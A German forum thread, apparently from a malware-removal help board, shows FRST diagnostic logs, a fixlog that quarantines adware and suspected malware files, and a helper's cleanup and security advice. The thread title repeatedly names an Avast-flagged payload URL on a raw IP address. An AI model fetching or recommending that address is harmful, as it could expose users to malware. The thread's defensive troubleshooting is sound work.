FirewallRules: [{1A477910-65C6-4715-B0E4-77C72C0E6053}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe
FirewallRules: [{FD954E80-8F27-4F66-AC73-B1BB87A63A4B}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe
FirewallRules: [{08DB855E-09A8-4875-BD7E-1B6AC90EAF17}] => (Block) LPort=5353
FirewallRules: [{FF3EDF2E-4953-4CE4-98D5-EA367626CD86}] => (Block) C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe
FirewallRules: [{3A61D0B1-77B9-4171-894A-579D088F2BA3}] => (Block) C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe
FirewallRules: [{47149BBC-1EAD-4B4F-8CE5-70E51AA51B35}] => (Allow) C:\Program Files (x86)\Grafik\CorelX5\Connect\Connect.exe
FirewallRules: [{2A3226C6-1C2C-4A82-A79F-89B6A547E762}] => (Allow) C:\Program Files (x86)\Grafik\CorelX5\Connect\Connect.exe
FirewallRules: [{01AD1DC4-26B1-4452-BA22-7945E0BED4B1}] => (Block) C:\Program Files\Media\VLC\vlc.exe
FirewallRules: [{3765A543-CC1F-49F5-B229-0781D050E86A}] => (Block) C:\Program Files\Media\VLC\vlc.exe
FirewallRules: [{5F827850-606C-44E2-8111-8634E5F2EDE2}] => (Allow) C:\Program Files\Media\VLC\vlc.exe
FirewallRules: [{15A06583-EED4-488F-A985-6EECD0A635D2}] => (Allow) C:\Program Files\Media\VLC\vlc.exe
FirewallRules: [{CCAC3702-8C37-482C-BB46-47FFBFC4B7D9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{84C06AE4-8AC3-4EE2-9F4F-063D4A3D8C9D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{E3BB1D5B-42FB-47E0-A2FB-8FA667DDE0FC}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{A07DB0EC-DA9D-4E34-A2CB-796AC10C9FA1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{4C0FF042-60FE-42E8-AFF1-7AF239F4B7D4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{A46C77D0-2D55-49FA-B87E-F326175E38F5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{66BB3B7C-A49D-44D3-92A7-B2EE903E8E0E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{CD81164C-C0F4-460D-9EE9-D81BC2985F64}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{13A4F32E-7D87-4E5A-B1A0-603FC14813A9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{E6FE2263-15CF-45C3-9199-59E37137BDFA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{A23074D6-73A3-4A46-9D61-EB1569267873}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{B573953F-D3E0-49D9-83AD-36E9C67CEA35}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{7106D5F3-AA51-4778-875F-8AE876D25A95}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{449549A4-D449-491A-B867-0B95CD3DE433}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{3874EDA5-E8C8-4A46-9DEF-E33B72195F1D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{1268C691-A8AC-40ED-9952-23D9C4BB71F8}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{8C243BF8-DB31-4DF7-940E-FA19302993E3}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{57C69D05-FBD6-4D9B-B451-EC9FE7A14258}] => (Block) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{CD23B2BB-D303-42A9-863C-B950A827912D}] => (Allow) C:\Users\Hamlet\AppData\Local\Temp\7zS3E3E\HPDiagnosticCoreUI.exe
FirewallRules: [{DAC8E436-A4CD-409F-97FD-EA1F98B923F0}] => (Allow) C:\Users\Hamlet\AppData\Local\Temp\7zS3E3E\HPDiagnosticCoreUI.exe
FirewallRules: [{75B5D5BE-C24E-4A83-8A5F-8E7DCE4F97B2}] => (Allow) Z:\fsetup.exe
FirewallRules: [{3BF98EC0-BFB2-4EE0-BB16-4CA84E371044}] => (Allow) Z:\fsetup.exe
FirewallRules: [TCP Query User{2CE196F2-4B52-4401-B08B-C708DBCC8D01}C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe] => (Allow) C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe
FirewallRules: [UDP Query User{6095DA53-011E-4477-A6F6-963C13AA33DB}C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe] => (Allow) C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe
FirewallRules: [{342AE7A5-5B4B-4E73-83D7-2799D06459B2}] => (Block) C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe
FirewallRules: [{11148652-24CA-499C-AE3B-1A16F68B4A46}] => (Block) C:\program files (x86)\embarcadero\studio\15.0\bin\bds.exe
FirewallRules: [{148FE666-819D-4FDE-89D7-9C2C214E9504}] => (Allow) C:\Users\Hamlet\AppData\Local\Google\Chrome SxS\Application\chrome.exe
FirewallRules: [{4D8F4D91-0BFD-4251-B967-E2FF562267D8}] => (Block) LPort=445
FirewallRules: [{A58ADA9D-72E6-4C61-B9B1-1EEDE10AD22B}] => (Block) LPort=445

==================== Wiederherstellungspunkte =========================

08-05-2017 07:38:59 Geplanter Prüfpunkt

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: TAP-VyprVPN Adapter V9
Description: TAP-VyprVPN Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-VyprVPN Provider V9
Service: tapvyprvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/08/2017 10:08:01 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/08/2017 09:58:51 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: FRST64.exe, Version: 6.5.2017.0, Zeitstempel: 0x590d966e
Name des fehlerhaften Moduls: FRST64.exe, Version: 6.5.2017.0, Zeitstempel: 0x590d966e
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000026754
ID des fehlerhaften Prozesses: 0x13f4
Startzeit der fehlerhaften Anwendung: 0x01d2c7d0bd19c9ce
Pfad der fehlerhaften Anwendung: C:\Users\Hamlet\Desktop\FRST64.exe
Pfad des fehlerhaften Moduls: C:\Users\Hamlet\Desktop\FRST64.exe
Berichtskennung: 2be83bd6-33c4-11e7-b899-002354355c9e

Error: (05/07/2017 05:09:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: rundll32.exe, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc637
Name des fehlerhaften Moduls: item.dat, Version: 0.0.0.0, Zeitstempel: 0x57a3414c
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00085cdc
ID des fehlerhaften Prozesses: 0xe2c
Startzeit der fehlerhaften Anwendung: 0x01d2c743e9aa85d8
Pfad der fehlerhaften Anwendung: C:\Windows\SysWOW64\rundll32.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\item.dat
Berichtskennung: 28ebbaa6-3337-11e7-b899-002354355c9e

Error: (05/07/2017 04:43:55 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\Hamlet\Desktop\esetsmartinstaller_deu.exe". Fehler in
Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (05/07/2017 04:43:52 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\Hamlet\Desktop\esetsmartinstaller_deu.exe". Fehler in
Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (05/07/2017 03:06:19 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: mbamservice.exe, Version: 3.1.0.415, Zeitstempel: 0x5881b7a1
Name des fehlerhaften Moduls: ScanControllerImpl.dll, Version: 3.0.0.667, Zeitstempel: 0x58d2ccf0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00000000001f1370
ID des fehlerhaften Prozesses: 0x648
Startzeit der fehlerhaften Anwendung: 0x01d2c6b1ddffe54c
Pfad der fehlerhaften Anwendung: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
Pfad des fehlerhaften Moduls: C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ScanControllerImpl.dll
Berichtskennung: 609f52f2-32c1-11e7-b899-002354355c9e

Error: (05/07/2017 12:42:55 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\Hamlet\Desktop\esetsmartinstaller_deu.exe". Fehler in
Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (05/07/2017 12:42:50 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\Hamlet\Desktop\esetsmartinstaller_deu.exe". Fehler in
Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (05/07/2017 12:42:27 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\Hamlet\Desktop\esetsmartinstaller_deu.exe". Fehler in
Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (05/06/2017 11:08:09 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.


Systemfehler:
=============
Error: (05/08/2017 10:12:51 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Software Protection" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (05/08/2017 10:12:34 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Installer" wurde unerwartet beendet. Dies ist bereits 2 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 300000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (05/08/2017 10:08:51 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA Display Driver Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (05/08/2017 10:08:47 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Installer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (05/08/2017 10:08:39 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA Update Service Daemon" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (05/08/2017 10:08:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Adobe Acrobat Update Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (05/08/2017 10:07:37 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/08/2017 10:07:04 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "InterBase XE3 Guardian developer_ibxe3" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (05/08/2017 10:07:04 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst InterBase XE3 Server developer_ibxe3 erreicht.

Error: (05/08/2017 10:06:36 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "DgiVecp" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Treiber konnte nicht geladen werden.


CodeIntegrity:
===================================
  Date: 2016-09-21 14:03:06.632
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume4\Windows\System32\drivers\aswHdsKe.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-09-21 14:03:06.632
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume4\Windows\System32\drivers\aswHdsKe.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-09-20 14:02:28.532
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume4\Windows\System32\drivers\aswHdsKe.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-09-20 14:02:28.531
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume4\Windows\System32\drivers\aswHdsKe.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz
Prozentuale Nutzung des RAM: 24%
Installierter physikalischer RAM: 8191.12 MB
Verfügbarer physikalischer RAM: 6207.57 MB
Summe virtueller Speicher: 32762.42 MB
Verfügbarer virtueller Speicher: 30630.81 MB

==================== Laufwerke ================================

Drive c: (System) (Fixed) (Total:195.31 GB) (Free:17.09 GB) NTFS
Drive d: (Coding) (Fixed) (Total:1804.41 GB) (Free:835.07 GB) NTFS
Drive e: (Videos) (Fixed) (Total:1397.26 GB) (Free:602.13 GB) NTFS
Drive t: (Tpart) (Fixed) (Total:713.67 GB) (Free:146.87 GB) NTFS
Drive u: (Upart) (Fixed) (Total:292.97 GB) (Free:180.19 GB) NTFS
Drive v: (Vista) (Fixed) (Total:195.31 GB) (Free:38.78 GB) NTFS
Drive w: (WinXP) (Fixed) (Total:58.59 GB) (Free:33.84 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 1397.3 GB) (Disk ID: E0D5472A)
Partition 1: (Not Active) - (Size=1397.3 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 1397.3 GB) (Disk ID: 00000001)
Partition 1: (Active) - (Size=195.3 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=195.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=293 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=713.7 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: C3F692C0)
Partition 1: (Active) - (Size=58.6 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=1804.4 GB) - (Type=OF Extended)

==================== Ende von Addition.txt ============================
         
Und für die Hinweise zu Chip, ich lade von denen nichts mehr herunter, hab ja gesehen, daß hier haufenweise Müll von Chip.de zu finden war.

Eines meiner alten Programme ist Textbridge, das bei einem meiner früheren Scanner dabei war und das auf Win7 nicht läuft. Habe bereits mehrere kostenfreie OCR-Erkennungen und diverse Trialversionen ausprobiert. Die Fehler von Textbridge kenne ich nun über die Jahre, andere OCR-Programme machen andere Fehler. Wenn ich mir mal einen neuen Rechner leisten kann, kommt da natürlich kein XP mehr drauf. Aber jetzt brauch ich's eben noch ab und zu, auch wenn's veraltet ist. Auch mein Fahrrad ist total veraltet, ich hab aber kein anderes
__________________

Alt 08.05.2017, 09:44   #34
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Zitat:
andere OCR-Programme machen andere Fehler.
Deswegen bei XP hängenzubleiben ist aber schon ziemlich schräg. Ich verwende als PDF-Betrachter immer PDF X-Change Viewer unter Windows. Der hat ne OCR Engine.

Die Anleitungen bitte genauer lesen. Ich bat um einen FRST-Fix samt fixlog. Nicht neue Logs von FRST.txt und Addition.txt.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 08.05.2017, 09:57   #35
Perlsau
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Sorry, war mein Fehler. Hier die Fixlog.txt:

Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 07-05-2017
durchgeführt von Hamlet (08-05-2017 10:48:36) Run:2
Gestartet von C:\Users\Hamlet\Desktop
Geladene Profile: Hamlet (Verfügbare Profile: Hamlet & UpdatusUser & Entwickler & Administrator & SQL Server Distributed Replay Controller & MsDtsServer110 & MSSQLServerOLAPService & ReportServer & SQL Server Distributed Replay Client & MSSQLFDLauncher & SQLSERVERAGENT & MSSQLSERVER)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
C:\Windows\debug\item.dat
E:\Temp\Search Extensions.7z
E:\Test\Test.7z
E:\_DownUnerledigt\N�hrwerttabellen\Ernährungsmanager-lnstall.exe
E:\_DownUnerledigt\PDF\PDFCreator-2_3_0-Setup.exe
E:\_DownUnerledigt\RamDisk\SoftPerfect RAM Disk Letzte Freeware Version - CHIP-Installer.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\023E36D1-BAB0-7891-9A97-7F31A65A1372\BExternal.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\023E36D1-BAB0-7891-9A97-7F31A65A1372\IEHelper.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-5HSES.tmp\InstallManager.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-76TRA.tmp\InstallManager.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-QFACO.tmp\InstallManager.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is1108708961\DeltaTB.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsf19.tmp\nsManWeb.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsqC6\nsxC7.tmp\SetupDataMngr_Searchqu.exe
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsr15.tmp\nsManWeb.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsx17.tmp\nsManWeb.dll
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\OCS\ocs_v7a.exe
emptytemp:
       
*****************

C:\Windows\debug\item.dat => erfolgreich verschoben
E:\Temp\Search Extensions.7z => erfolgreich verschoben
E:\Test\Test.7z => erfolgreich verschoben
"E:\_DownUnerledigt\Nährwerttabellen\Ernährungsmanager-lnstall.exe" => nicht gefunden.
E:\_DownUnerledigt\PDF\PDFCreator-2_3_0-Setup.exe => erfolgreich verschoben
E:\_DownUnerledigt\RamDisk\SoftPerfect RAM Disk Letzte Freeware Version - CHIP-Installer.exe => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\023E36D1-BAB0-7891-9A97-7F31A65A1372\BExternal.dll => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\023E36D1-BAB0-7891-9A97-7F31A65A1372\IEHelper.dll => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-5HSES.tmp\InstallManager.exe => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-76TRA.tmp\InstallManager.exe => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is-QFACO.tmp\InstallManager.exe => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\is1108708961\DeltaTB.exe => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsf19.tmp\nsManWeb.dll => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsqC6\nsxC7.tmp\SetupDataMngr_Searchqu.exe => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsr15.tmp\nsManWeb.dll => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\nsx17.tmp\nsManWeb.dll => erfolgreich verschoben
W:\Dokumente und Einstellungen\MasterUser\Lokale Einstellungen\Temp\OCS\ocs_v7a.exe => erfolgreich verschoben

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15481197 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 40336 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
Hamlet => 4964132 B
UpdatusUser => 0 B
Entwickler => 0 B
Administrator => 0 B
SQL Server Distributed Replay Controller => 0 B
MsDtsServer110 => 0 B
MSSQLServerOLAPService => 0 B
ReportServer => 0 B
SQL Server Distributed Replay Client => 0 B
MSSQLFDLauncher => 0 B
SQLSERVERAGENT => 0 B
MSSQLSERVER => 0 B

RecycleBin => 47897 B
EmptyTemp: => 19.6 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 10:49:02 ====
         


Alt 08.05.2017, 09:59   #36
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Was ist jetzt noch an Problemen offen?
Dass du XP wegschmeißen musst ist ja angekommen oder? Zumindest darf es nicht mehr ins Internet. Also Kabel ziehen und dann erst Windows XP booten. Und natürlich auch KEINE wifi Verbindungen unter XP.
__________________
--> Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat

Alt 08.05.2017, 10:02   #37
Perlsau
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Okay, deinem Rat, mit XP nicht ins Internet zu gehen, werde ich gleich mal umsetzen: Ich blockiere den Internetverkehr unter XP vollständig. Updates brauch ich in XP ja nicht mehr.

Bin ich damit jetzt erstmal virenfrei?

Alt 08.05.2017, 10:03   #38
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Dann wären wir durch!

Wenn Du möchtest, kannst Du hier sagen, ob Du mit mir und meiner Hilfe zufrieden warst...und/oder das Forum mit einer kleinen Spende unterstützen.

Abschließend müssen wir noch ein paar Schritte unternehmen, um dein System aufzuräumen und abzusichern.


Cleanup
Alle Logs gepostet?
Dann lade Dir bitte DelFix herunter.
  • Schließe alle offenen Programme.
  • Starte die delfix.exe mit einem Doppelklick.
  • Setze vor jede Funktion ein Häkchen.
  • Klicke auf Start.

Hinweis: DelFix entfernt u.a. alle verwendeten Programme, die Quarantäne unserer Scanner, den Java-Cache und löscht sich abschließend selbst.
Starte Deinen Rechner abschließend neu. Sollten jetzt noch Programme aus unserer Bereinigung übrig sein, kannst Du diese bedenkenlos löschen.




Absicherung
Beim Betriebsystem Windows die automatischen Updates aktivieren. Auch sicherheitsrelevante Software sollte immer in aktueller Version vorliegen - sofern benötigt, wenn nicht benötigt natürlich sinnigerweise deinstallieren oder Alternativen verwenden (und diese aktuell halten).

Das zeitnahe Einspielen von Updates ist erforderlich, damit Sicherheitslücken geschlossen werden; Sicherheitslücken werden dazu ausgenutzt, um beim einfachen Besuch einer manipulierten Website per "Drive-by" Malware zu installieren. Besonders aufpassen bzgl. der Aktualität musst du bei folgender Software:
  • Browser (Internet Explorer, Edge, Firefox, Chrome, ...)

  • Flash Player: Was Adobe mit seinem Flash Player veranstaltet, ist irgendwo zwischen Frechheit und Inkompetenz einzustufen; in dem Teil werden ständig neue dicke Sicherheitslücken gefunden - für YT reicht meistens HTML5 aus, das ist der Standardplayer wenn der Flash Player inaktiv oder nicht installiert ist; für spezielle Browsergames kann es aber sein, dass du den Flash Player brauchst. Nutze Flash so sparsam wie möglich und wenn dann immer aktuell halten!!

  • Java: Spielt kaum noch eine Rolle. Fast nirgendwo werden mehr Java-Applets eingesetzt. Wird noch für spezielles Zeugs in OpenOffice genutzt, IIRC brauchen auch manche Games Java. Aber wirklich sehr selten.

  • PDF-Reader: NICHT den AdobeReader benutzen, sondern besser sowas wie PDF-X-Change Viewer; der interne PDF-Betrachter vom Firefox reicht meist auch aus. Vermeide Adobe unbedingt, das ist eine Firma mit miserabler Sicherheitspolitik!


Optional:
